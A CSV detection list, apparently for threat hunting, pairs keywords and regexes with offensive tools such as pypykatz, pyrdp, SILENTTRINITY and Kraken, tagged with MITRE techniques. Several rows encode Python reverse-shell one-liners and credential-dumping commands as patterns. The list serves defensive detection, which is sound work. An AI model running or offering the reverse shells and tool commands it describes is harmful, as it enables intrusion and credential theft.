"*pypykatz.exe*",".{0,1000}pypykatz\.exe.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatz.git*",".{0,1000}pypykatz\.git.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation 
in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatz.kerberos*",".{0,1000}pypykatz\.kerberos.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatz.lsadecryptor*",".{0,1000}pypykatz\.lsadecryptor.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatz.py*",".{0,1000}pypykatz\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatz.pypykatz*",".{0,1000}pypykatz\.pypykatz.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*pypykatz.registry*",".{0,1000}pypykatz\.registry.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" 
"*pypykatz.zip*",".{0,1000}pypykatz\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*pypykatz_handler.py*",".{0,1000}pypykatz_handler\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*pypykatz_rekall.py*",".{0,1000}pypykatz_rekall\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatzClass*",".{0,1000}pypykatzClass.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*pypykatzfile*",".{0,1000}pypykatzfile.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*pypykatz-master.zip*",".{0,1000}pypykatz\-master\.zip.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential 
Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*Pyramid-main.zip*",".{0,1000}Pyramid\-main\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*pyrdp.core.mitm*",".{0,1000}pyrdp\.core\.mitm.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp.enum.rdp*",".{0,1000}pyrdp\.enum\.rdp.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp.logging.log*",".{0,1000}pyrdp\.logging\.log.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp.parser.rdp*",".{0,1000}pyrdp\.parser\.rdp.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for 
Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp_output -*",".{0,1000}pyrdp_output\s\-.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp_scapy.py*",".{0,1000}pyrdp_scapy\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp-clonecert.py*",".{0,1000}pyrdp\-clonecert\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp-convert.py*",".{0,1000}pyrdp\-convert\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & 
Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp-mitm *",".{0,1000}pyrdp\-mitm\s.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp-mitm.py*",".{0,1000}pyrdp\-mitm\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp-player.py*",".{0,1000}pyrdp\-player\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrit -e * create_essid*",".{0,1000}pyrit\s\-e\s.{0,1000}\screate_essid.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pyrit -i *.txt import_passwords*",".{0,1000}pyrit\s\-i\s.{0,1000}\.txt\simport_passwords.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pyrit -r *.pcap attack_db*",".{0,1000}pyrit\s\-r\s.{0,1000}\.pcap\sattack_db.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pyrit -r *.pcap -b * -i *.txt attack_passthrough*",".{0,1000}pyrit\s\-r\s.{0,1000}\.pcap\s\-b\s.{0,1000}\s\-i\s.{0,1000}\.txt\sattack_passthrough.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pysnaffler -*",".{0,1000}pysnaffler\s\-.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. 
Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*pysnaffler 'smb2+kerberos+password:*",".{0,1000}pysnaffler\s\'smb2\+kerberos\+password\:.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*pysnaffler 'smb2+ntlm-nt://*",".{0,1000}pysnaffler\s\'smb2\+ntlm\-nt\:\/\/.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*pysnaffler 'smb2+ntlm-password://*",".{0,1000}pysnaffler\s\'smb2\+ntlm\-password\:\/\/.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. 
Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*pysnaffler.whatif:main*",".{0,1000}pysnaffler\.whatif\:main.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*pysnaffler/_version.py*",".{0,1000}pysnaffler\/_version\.py.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*pysnaffler-main*",".{0,1000}pysnaffler\-main.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. 
Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","1","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*pysoserial.py*",".{0,1000}pysoserial\.py.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "*Pysoserial-main*",".{0,1000}Pysoserial\-main.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "*pysoxy-master*",".{0,1000}pysoxy\-master.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","0","N/A","10","10","118","47","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z" "*PySplunkWhisperer2*",".{0,1000}PySplunkWhisperer2.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" 
"*pystinger_for_darkshadow*",".{0,1000}pystinger_for_darkshadow.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*python 3 st teamserver *",".{0,1000}python\s3\sst\steamserver\s.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*python -c*'import socket,subprocess,os'*socket.socket(socket.AF_INET*connect((""*))*dup2*pty.spawn(""sh"")'*",".{0,1000}python\s\-c.{0,1000}\'import\ssocket,subprocess,os\'.{0,1000}socket\.socket\(socket\.AF_INET.{0,1000}connect\(\(\"".{0,1000}\)\).{0,1000}dup2.{0,1000}pty\.spawn\(\""sh\""\)\'.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python -c*socket.socket()*connect*dup2*pty.spawn(""/bin/bash"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""\/bin\/bash\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python -c*socket.socket()*connect*dup2*pty.spawn(""/bin/sh"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""\/bin\/sh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python -c*socket.socket()*connect*dup2*pty.spawn(""bash"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""bash\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python -c*socket.socket()*connect*dup2*pty.spawn(""cmd"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""cmd\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python -c*socket.socket()*connect*dup2*pty.spawn(""powershell"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""powershell\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python -c*socket.socket()*connect*dup2*pty.spawn(""pwsh"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""pwsh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python 
-c*socket.socket()*connect*dup2*pty.spawn(""sh"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""sh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python -c*socket.socket()*connect*dup2*pty.spawn(""zsh"")*",".{0,1000}python\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}dup2.{0,1000}pty\.spawn\(\""zsh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python dkmc.py*",".{0,1000}python\sdkmc\.py.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*python kraken.py -*",".{0,1000}python\skraken\.py\s\-.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","10","10","495","48","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z" "*python -m orbitaldump *",".{0,1000}python\s\-m\sorbitaldump\s.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","5","453","89","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*python -m peas -u 
*",".{0,1000}python\s\-m\speas\s\-u\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*python -m rarce *",".{0,1000}python\s\-m\srarce\s.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*python main.py --KEY=* --URL=*127.0.0.1*",".{0,1000}python\smain\.py\s\-\-KEY\=.{0,1000}\s\-\-URL\=.{0,1000}127\.0\.0\.1.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*python noPac.*",".{0,1000}python\snoPac\..{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*python raiseChild.py -*",".{0,1000}python\sraiseChild\.py\s\-.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*python reuse.py --start --rhost * --rport *",".{0,1000}python\sreuse\.py\s\-\-start\s\-\-rhost\s.{0,1000}\s\-\-rport\s.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*python rsf.py*",".{0,1000}python\srsf\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*python 
